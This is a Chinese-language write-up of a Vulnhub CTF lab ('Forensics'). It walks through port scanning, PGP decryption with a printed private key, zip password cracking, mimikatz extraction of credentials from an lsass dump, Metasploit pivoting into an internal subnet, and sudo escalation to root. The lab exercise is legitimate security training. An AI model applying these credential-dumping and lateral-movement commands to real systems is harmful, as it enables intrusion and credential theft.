声明

好好学习,天天向上

搭建

vmware打开,网络和攻击机一样,桥接模式

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.31.152 -p 1-65535 -oN nmap.A

开启端口

发现开启80,22,很简单的两个端口

访问80

http://192.168.31.152

点一下右上角的get flag,真骚气

网站上图片好多呀,邮件查看源代码,发现images目录,访问一下

把这些图片都下载下来,看看fingerprint这个指纹,使用file命令查看,发现flag

dirb扫描txt后缀,发现tips.txt

dirb http://192.168.31.152 -X .txt
http://192.168.31.152/tips.txt

发现两个路径

/flag.zip
/igolder

访问发现,一个zip,一个txt都下载下来

在线解密网址

https://youritmate.us/pgp/

滑到最下面粉红色处,输入message和私钥,使用私钥解密

Your encrypted message:填

-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0hQEMA10YY4bPiiBWAQf8DaEoVUWpzj5+3WMZcOhjfXo6Hk+MKD5TLWy5XndaEXRZ
3+aUQuECr88LG83BzmAS1MITHf7xifx4aiqgeM6bGILlvseP9W2Fmv9E5KOVLUYI
T8V3jINwmNg7FinwuYlT2ld2yU1qMwiEZ8GPTK4U90WSZh+/dYnKTVKxjdEZXlj9
FF42BygUxjJgEDFQi0HhUb7AX+tYQIQV0p5DZcTETZweyM9OBcwuhwzspjKp3Rz9
zFcnnCEZ4+JbdXTcXPD9cTBHJhWk01lclg+XR4v572HilznzWFutqcWrMuhBO0UZ
q0v1MOG03o8MN2VysMgbk8gEdOs+GE8fPBtsKqS5tsmhcwZR3QA/BctqAT+IhYtI
s7j0pd+mTG+zvQu5B41isicBb0yLA80YVlfWjjUmZAAF4oowPKJWY9CQIap39Ked
cbLU2+CI3JJf7JZvcZK4KGeuYgpRXU8Jvu3BHSEu1zCHGgieYRW254OJYZcJYFx6
v+6OPq+UNCBbhAFRjJpkOigA+GgH5lGf0vRYM/gz5vA4MDRrEojFs9DIwATbflqN
QOs=
=Y9OD
-----END PGP MESSAGE-----

Your private key:私钥填

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0lQOsBF9sr70BCACvH5Vs2Lp9nyVIbVk4yraUmxDBxPJNitlU/IqcR2d+UDEORbDl
UClLXSqapjBFuu24p86SIcv/1VktRh79lnL5j4uKSAEuI/t6SJW4hlfovVBndUvT
X61w6TRJlLq5AsLOS38PWpIgL1ECIqliwNfCjjlvQd8xm/C9BV1lqM71JYtW34ST
XsKzxomVqGtWvrzs/tFege20z12JtqgPmqGApXzNjI4y7iH0vvVS8nCF58nwyjoH
wbx6EXk002hDe0/W7tsCGhp3gU5wzkUy4kfBfVrLp0/23kA/k4iJvlMPMAeQoJPx
AymXmXEKlp+igBrBicBw68SZgLAQhg8ZO2ybABEBAAH/AwMC/MDF76NvTu1gM8Y7
xjKap2L3OY8xeOoAeMQUueabuTP2rl7jB6YfsEcQj4xDjz0SBXIQxP0PziHpXTk3
v5FlH5nhSWZI6OgN0HF6rdjByKT4CNlkt7IVIPEQc7IidQP5K1/YhbghysyYHyBH
3TRAEwJszcjj6TsAOM1mpLXlPweM1sC3ms8xoFVSipPcHviNcQq58zLpGcWvmmuc
ZfqrRBqfpU/wZEmEvcDW1FOCvq/Bqo1psPOXYfI+ul7C0MLObmzi/u2p7EJLwf2E
tGBJ++wLdProHJHovp0WlQSHFamOWmM5p9SAq7lMegvIn3NHe0ZQS2agjBzNiMW5
LK/dZ0i1lX1SSRNNOlLC+Tf/v6bS8gAD+WSGsYEITPcRP2OpCiCBoa4d7GsK7nyF
RHIngmJrp5g1agayG92ahUFRLqQ7KGa+hu3N8/pM+x/dNH1Uw/jhKHsacpgBBCPf
Zs/NZlcMbCI0TD6CFKe2QCEnOW6iLlOEgV2ptEPJLkinaFZ8BEf5HYHUhW1CqwTZ
otvsmzkijYDvaV77zylVqb9gMJelVNWLZG3fcw+eCGF1wBBxno99xcxEgJpzdOeH
TnU3yQ1JllZb/0jQ7vBq22hrOTYo9iRBe/XOnUj1+J8QVynYLcgvEx8I8/tXnfNM
/bQkwbEohnTzklDWWKrqBXlXOTpBKZL4bk+k0U5wMpOQOkCgiHTMmklmAV/+0S/G
5EDrNNdCDCIdtXtAHJjIUtVivNNyQIgVuImYbhbXcSWziX0IT0QkRGSz8a+/MKl3
0yItTNXi/KpnOt+xfvjavzPscXyKyt7+82feOsl4f/jDFZW6P4NifjWGeP+9Q8FA
MPPZ/xDjhIgBvsqLpGDEuYp7VTVxWWIUtzao7P4WzLQAiQEcBBABAgAGBQJfbK+9
AAoJEF0YY4bPiiBW83YH/jU75ZqnBG3yJGOYa7qapXIPc/Dg6jc1FuivWlphZs8C
PSog9kqEqlY3k5OY03YBMIRgWMI2UyCgiSPcgwF8bGXm8hPQgL0QN5cFX7uubH9S
ofeM+SyRRSpuXtcWgljHe6e/ABR533bwLdk6YyHf4YyCxCDxWZRdI/FyoRYrh7q4
CTfgVJoiem1P9sViva28IBJ+H1ctyioWVEkKz1/PW9NBYy9mTbmVlwdWW1IzXRiS
OcXu0tW1rawJ/z5SwCwjKZxvSm2Hfk9eguEojbfPIoXauNRH00u4tEHO6YjD54ZC
DxpZfSHSCsOWEfOAA5EO+uDGSY4+WB6ihKmCV+i68Jc=
=KoPg
-----END PGP PRIVATE KEY BLOCK-----

点击解密后,message出变为明文,告诉我们密码是3位,前三位是for,后三位是数字

In case the forensic investigator forgets his password, this hint can help him, where the password is of 6 characters long , starting  3 characters is the word  "for" and the ending 3 characters are numeric

flag.zip是需要密码的,看来需要爆破出这个密码了

先生成字典

crunch 6 6 -t for%%% -o pass.dic
fcrackzip -u -D -p pass.dic flag.zip

拿到windows里面看看,解压出来的pdf里面发现flag

还有一个DMP文件,打开mimikatz,进入命令行输入

sekurlsa::minidump C:\Users\attack\Desktop\delete\lsass.dmp
sekurlsa::logonPasswords full

往下滑看到用户和密码

jasoos
raj
64fbae31cc352fc26af97cbdef151e03
c220d333379050d852f3e65b010a817712b8c176

在线解密

ssh登录

ssh jasoos@192.168.31.152
Password@1

登进去后,发现172开头的IP,该进行横向渗透了

主机存活&端口发现

nmap -sP 172.17.0.1/24
nmap -T4 -A 172.17.0.1 -p 1-65535 -oN nmap.A
nmap -T4 -A 172.17.0.2 -p 1-65535 -oN nmap.A

发现0.2开启了21ftp,进入之

ftp 172.17.0.2

不太好用,转用msf,内网渗透还是msf好使

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.31.152
set username jasoos
set password Password@1
exploit
session -u 1
use post/multi/manage/autoroute
set session 2
exploit
session -u 2

使用ping去扫描存活主机(session设置成和上面那个一样)

use post/multi/gather/ping_sweep
set session 1
set rhosts 172.17.0.0/24
exploit

扫描端口发现ftp,扫描ftp发现匿名访问

use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set port 1-100
exploit
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit

使用刚刚的ssh,进入ftp查看文件:

ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001

下载到了靶机本地,需要靶机开启http,然后才能下载到攻击机本地

python -m SimpleHTTPServer

访问

http://192.168.31.152:8000

拿到flag3

解密creds.txt里面的文件内容

amVlbmFsaWlzYWdvb2RnaXJs

base64解密后

jeenaliisagoodgirl

su到用户forensic

su forensic
jeenaliisagoodgirl

sudo -l具有root权限

sudo su root

拿到flag

总结

1.信息收集

发现80和22

80中源码包含敏感目录,查看敏感目录发现图片,查看图片属性拿到flag

dirb扫描txt后缀目录,发现敏感目录,里面后一个zip包和一个PGP的私钥+密文,在线PGP解密后,解压缩zip包发现flag以及DMP文件

2.web权限

3.shell权限

使用mimikatz打开DMP文件,发现用户+密码,解密密码后,ssh登录

通过横向渗透,发现另一台主机有ftp服务,匿名进入ftp服务,发现压缩包,下载到本地,解压后发现flag和密码密文,解密后su到这个用户

4.权限维持

5.提权

通过sudo直接su到root,拿到flag

Vulnhub靶机实战-Forensics相关推荐

  1. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  2. Vulnhub靶机实战——DC-8

    靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...

  3. Vulnhub靶机实战——DC-5

    靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...

  4. Vulnhub靶机实战——Matrix2

    Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Ma ...

  5. 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...

  6. 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...

  7. Vulnhub靶机实战——Matrix3

    下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...

  8. Vulnhub靶机实战——DC-3

    靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...

  9. DC-5 vulnhub靶机实战

    首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...

最新文章

  1. 1008. 数组元素循环右移问题 (20)
  2. c++常见操作的模板
  3. AAAI 2019 《LiveBot: Generating Live Video Comments Based on Visual and Textual Contexts》论文笔记
  4. C语言中fun的功能是将字符串,下列给定的程序中,fun()函数的功能是:将p所指字符串中......
  5. java ee 的使用方法_改善Java EE生产支持技能的8种方法
  6. 海湾监控计算机,海湾GST-DH9300电气火灾监控图形显示系统软件
  7. ubuntu16.04 安装完显卡驱动后分辨率固定640x480 解决
  8. win、linux下tomcat内存的修改
  9. 基于C语言的图形化编程软件,图形化编程工具
  10. 猎豹网校 ASP.NET全套教程
  11. 人口普查数据有疑问???
  12. fastboot与fastbootd介绍
  13. 《东周列国志》第九十六回 蔺相如两屈秦王 马服君单解韩围
  14. BGP Dampening Cyrus
  15. html的英文全称怎么读,HTML标签英文全称对照.doc
  16. 成功就是一种自我满足
  17. 施工企业安全教育培训数字化解决方案
  18. 参加情商管理与沟通技巧培训的感受(1)
  19. 逼真的合成语音,独家出品,这款真香作品更新了!
  20. 2016 CCF大数据与计算智能大赛 开源资料整理

热门文章

  1. linux系统外接硬盘_Mac的外置硬盘上如何去安装Linux系统
  2. 读《鲁冰逊漂流记》知识归纳思维导图模板
  3. 群辉 虚拟linux,黑群晖DSM6.2.1在centos7的KVM里面总是crash
  4. 视频直播搭建(个人记录)
  5. 用 Qt 控制 Nikon 显微镜的电动物镜转盘
  6. linux 负载高 标准,linux 系统负载高 如何检查
  7. 2.6.3 FTTx技术
  8. 126邮箱页面源码的思考
  9. html 显示视频列表,dvd光碟制作节目轨菜单布局,不要视频缩略图,只显示文件列表...
  10. 1、通过 BitNami 部署 RedMine